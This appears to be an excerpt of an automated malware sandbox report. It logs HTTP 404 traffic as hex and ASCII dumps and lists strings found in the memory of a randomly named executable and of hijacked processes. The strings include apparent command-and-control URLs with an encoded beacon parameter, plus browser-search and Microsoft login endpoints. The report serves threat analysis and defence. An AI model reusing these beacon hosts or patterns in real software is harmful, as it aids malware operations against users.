3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 01:54:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 c8 11 4a 60 e3 f7 b3 f6 96 1d f9 45 7f 06 a0 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 38 7a 56 b9 c5 8d 3c 9c b0 cc 63 0b c8 62 1f 67 76 f4 7f b0 dd d7 1e 7f 16 90 c8 ed 4e cf 4c de c7 ae 07 a4 64 d5 55 f6 7e b3 97 e1 e2 59 8a 3f 8e bf 9d 7d 80 22 d7 1a 78 3b e9 57 80 c8 3c 4b 4b f7 3e 4c bd ec e6 a0 af 72 65 2f ed 6d ef ab e5 65 65 55 75 09 b4 e3 b8 37 8b 2f a8 79 56 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 9d f2 96 23 eb 93 43 fd 3a 89 fb b0 72 93 f2 86 cc 77 24 61 00 47 3f 98 52 98 be 99 f2 18 ff 04 68 d7 fa b8 a1 fe 82 e3 7d 56 55 59 f2 30 e8 f7 78 3b 6c 2f af 2b 2c a1 c3 eb c1 2b 49 bc a3 7f 2b 86 5e dd f7 8e 6b 67 85 d5 eb ef 61 00 5c 8a 5b f4 4e e8 fd 46 af 12 07 fe 88 61 af b4 f1 e9 3e 0f 41 d6 b8 c5 15 be de b3 f1 e0 65 76 5d 7e 3e 6c 01 3f d3 dc 5a ce 2b 13 18 3d 24 c6 c3 37 06 af 98 f8 1c c5 af 7e ed 23 45 fd 82 18 eb f8 46 37 df 2d 2d 4c 2f 3e fb 03 9f 17 87 65 75 7f 09 2b 3d e0 53 77 90 d5 55 19 02 87 d0 7f bc b1 df 2b f2 95 bb 1b 67 fc 1d 5e 57 fd 6f a7 05 3c c5 e1 0d 5b 5e 9c f5 f6 d5 7b c6 f7 3b 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc 8d bf 91 fc 7a 63 37 2f a0 ff 68 a7 4b c0 05 31 ea 33 1f d6 3b 82 fb 30 b1 fc 5b 35 7e 3f d4 a7 be f7 b2 b4 bf e5 80 00 75 7b be 3e e6 b6 2f f1 71 9f c5 ce db 29 7a 39 5e 9f f2 47 19 b4 59 e1 dc ef 01 46 22 10 a3 fa 3f f7 56 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 01:54:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 c8 11 4a 60 e3 f7 b3 f6 96 1d f9 45 7f 06 a0 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 38 7a 56 b9 c5 8d 3c 9c b0 cc 63 0b c8 62 1f 67 76 f4 7f b0 dd d7 1e 7f 16 90 c8 ed 4e cf 4c de c7 ae 07 a4 64 d5 55 f6 7e b3 97 e1 e2 59 8a 3f 8e bf 9d 7d 80 22 d7 1a 78 3b e9 57 80 c8 3c 4b 4b f7 3e 4c bd ec e6 a0 af 72 65 2f ed 6d ef ab e5 65 65 55 75 09 b4 e3 b8 37 8b 2f a8 79 56 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 9d f2 96 23 eb 93 43 fd 3a 89 fb b0 72 93 f2 86 cc 77 24 61 00 47 3f 98 52 98 be 99 f2 18 ff 04 68 d7 fa b8 a1 fe 82 e3 7d 56 55 59 f2 30 e8 f7 78 3b 6c 2f af 2b 2c a1 c3 eb c1 2b 49 bc a3 7f 2b 86 5e dd f7 8e 6b 67 85 d5 eb ef 61 00 5c 8a 5b f4 4e e8 fd 46 af 12 07 fe 88 61 af b4 f1 e9 3e 0f 41 d6 b8 c5 15 be de b3 f1 e0 65 76 5d 7e 3e 6c 01 3f d3 dc 5a ce 2b 13 18 3d 24 c6 c3 37 06 af 98 f8 1c c5 af 7e ed 23 45 fd 82 18 eb f8 46 37 df 2d 2d 4c 2f 3e fb 03 9f 17 87 65 75 7f 09 2b 3d e0 53 77 90 d5 55 19 02 87 d0 7f bc b1 df 2b f2 95 bb 1b 67 fc 1d 5e 57 fd 6f a7 05 3c c5 e1 0d 5b 5e 9c f5 f6 d5 7b c6 f7 3b 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc 8d bf 91 fc 7a 63 37 2f a0 ff 68 a7 4b c0 05 31 ea 33 1f d6 3b 82 fb 30 b1 fc 5b 35 7e 3f d4 a7 be f7 b2 b4 bf e5 80 00 75 7b be 3e e6 b6 2f f1 71 9f c5 ce db 29 7a 39 5e 9f f2 47 19 b4 59 e1 dc ef 01 46 22 10 a3 fa 3f f7 56 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 01:54:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 c8 11 4a 60 e3 f7 b3 f6 96 1d f9 45 7f 06 a0 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 38 7a 56 b9 c5 8d 3c 9c b0 cc 63 0b c8 62 1f 67 76 f4 7f b0 dd d7 1e 7f 16 90 c8 ed 4e cf 4c de c7 ae 07 a4 64 d5 55 f6 7e b3 97 e1 e2 59 8a 3f 8e bf 9d 7d 80 22 d7 1a 78 3b e9 57 80 c8 3c 4b 4b f7 3e 4c bd ec e6 a0 af 72 65 2f ed 6d ef ab e5 65 65 55 75 09 b4 e3 b8 37 8b 2f a8 79 56 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 9d f2 96 23 eb 93 43 fd 3a 89 fb b0 72 93 f2 86 cc 77 24 61 00 47 3f 98 52 98 be 99 f2 18 ff 04 68 d7 fa b8 a1 fe 82 e3 7d 56 55 59 f2 30 e8 f7 78 3b 6c 2f af 2b 2c a1 c3 eb c1 2b 49 bc a3 7f 2b 86 5e dd f7 8e 6b 67 85 d5 eb ef 61 00 5c 8a 5b f4 4e e8 fd 46 af 12 07 fe 88 61 af b4 f1 e9 3e 0f 41 d6 b8 c5 15 be de b3 f1 e0 65 76 5d 7e 3e 6c 01 3f d3 dc 5a ce 2b 13 18 3d 24 c6 c3 37 06 af 98 f8 1c c5 af 7e ed 23 45 fd 82 18 eb f8 46 37 df 2d 2d 4c 2f 3e fb 03 9f 17 87 65 75 7f 09 2b 3d e0 53 77 90 d5 55 19 02 87 d0 7f bc b1 df 2b f2 95 bb 1b 67 fc 1d 5e 57 fd 6f a7 05 3c c5 e1 0d 5b 5e 9c f5 f6 d5 7b c6 f7 3b 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc 8d bf 91 fc 7a 63 37 2f a0 ff 68 a7 4b c0 05 31 ea 33 1f d6 3b 82 fb 30 b1 fc 5b 35 7e 3f d4 a7 be f7 b2 b4 bf e5 80 00 75 7b be 3e e6 b6 2f f1 71 9f c5 ce db 29 7a 39 5e 9f f2 47 19 b4 59 e1 dc ef 01 46 22 10 a3 fa 3f f7 56 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 01:54:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20

Source: control.exe, 00000005.00000002.2628309209.00000000053E4000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.000000000589A000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002F9A000.00000004.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000399E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: control.exe, 00000005.00000002.2628309209.0000000005576000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002C76000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm
Source: rVnDkmUdXXPrwb.exe, 00000008.00000002.2623602119.00000000008AF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.athanasopoulos.xyz
Source: rVnDkmUdXXPrwb.exe, 00000008.00000002.2623602119.00000000008AF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.athanasopoulos.xyz/c3ib/
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033A
